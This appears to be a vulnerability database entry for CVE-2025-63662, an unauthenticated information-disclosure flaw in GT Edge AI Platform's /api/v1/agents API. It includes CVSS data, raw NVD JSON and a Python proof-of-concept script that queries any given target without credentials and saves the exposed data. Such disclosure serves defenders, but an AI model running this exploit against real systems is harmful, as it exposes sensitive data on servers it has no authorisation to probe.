Security Vulnerability Report
中文
CVE-2025-63662 CVSS 7.5 HIGH

CVE-2025-63662

Published: 2025-12-22 19:15:49
Last Modified: 2026-01-05 17:44:44

Description

Insecure permissions in the /api/v1/agents API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access sensitive information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:* - VULNERABLE
GT Edge AI Platform < v2.0.10-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63662 PoC - GT Edge AI Platform Unauthorized Access # Usage: python3 poc.py [target_url] import requests import json import sys def exploit_cve_2025_63662(target_url): """ Exploit for CVE-2025-63662: Insecure permissions in /api/v1/agents API This PoC demonstrates unauthorized access to sensitive agent information. """ # Target endpoint endpoint = f"{target_url.rstrip('/')}/api/v1/agents" # No authentication required - this is the vulnerability headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } print(f"[*] Targeting: {endpoint}") print(f"[*] Sending unauthenticated request...") try: # Send GET request without authentication response = requests.get(endpoint, headers=headers, timeout=10, verify=False) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[!] VULNERABLE - Unauthorized access successful!") print("\n[+] Response Data:") data = response.json() print(json.dumps(data, indent=2)) # Save response to file with open("cve_2025_63662_output.json", "w") as f: json.dump(data, f, indent=2) print("\n[+] Data saved to cve_2025_63662_output.json") return True elif response.status_code == 401: print("[-] NOT VULNERABLE - Authentication required") return False else: print(f"[-] Unexpected status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py <target_url>") print("Example: python3 poc.py https://vulnerable-server.com") sys.exit(1) exploit_cve_2025_63662(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63662", "sourceIdentifier": "[email protected]", "published": "2025-12-22T19:15:49.273", "lastModified": "2026-01-05T17:44:43.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure permissions in the /api/v1/agents API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:*", "versionEndExcluding": "2.0.12", "matchCriteriaId": "B5535437-227D-49B8-A0E1-D5A8585D8BF3"}]}]}], "references": [{"url": "https://gist.github.com/p80n-sec/48ce34c929e8b946f0ad25f76e7b8cef", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending", "source": "[email protected]", "tags": ["Broken Link"]}]}}